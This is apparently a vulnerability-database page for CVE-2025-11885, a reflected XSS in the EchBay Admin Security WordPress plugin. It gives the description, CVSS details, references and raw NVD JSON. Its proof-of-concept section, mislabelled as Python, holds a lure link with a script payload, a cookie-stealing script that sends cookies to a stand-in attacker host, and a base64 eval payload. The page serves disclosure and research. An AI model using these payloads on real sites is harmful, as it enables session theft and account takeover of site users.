CVE-2025-11885

Description

The EchBay Admin Security plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_ebnonce' parameter in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

EchBay Admin Security插件 <= 1.3.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-11885 PoC - Reflected XSS via _ebnonce parameter -->
<!-- Target: WordPress site with EchBay Admin Security plugin <= 1.3.0 -->

<!-- Malicious URL to trigger XSS -->
<!-- Replace 'target-site.com' with the vulnerable WordPress site URL -->
<a href="https://target-site.com/wp-admin/admin.php?_ebnonce=<script>alert('XSS Vulnerability CVE-2025-11885')</script>">Click here for free prize</a>

<!-- More sophisticated payload for cookie stealing -->
<script>
  // Cookie stealing payload
  var stolen_cookies = document.cookie;
  // Send cookies to attacker-controlled server
  fetch('https://attacker-server.com/steal?cookies=' + encodeURIComponent(stolen_cookies));
</script>

<!-- Base64 encoded payload example -->
<!-- <script>eval(atob('YWxlcnQoJ1hTUyBDVkUtMjAyNS0xMTg4NScp'))</script> -->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11885
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11885
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11885/
[4] VulDB https://vuldb.com/cve/CVE-2025-11885
[5] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3398386%40echbay-admin-security&new=3398386%40echbay-admin-security&sfp_email=&sfph_mail=
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/6e7bd966-9a98-4192-83d9-e1682ec00a02?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11885", "sourceIdentifier": "[email protected]", "published": "2025-11-21T08:15:51.970", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The EchBay Admin Security plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_ebnonce' parameter in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3398386%40echbay-admin-security&new=3398386%40echbay-admin-security&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6e7bd966-9a98-4192-83d9-e1682ec00a02?source=cve", "source": "[email protected]"}]}}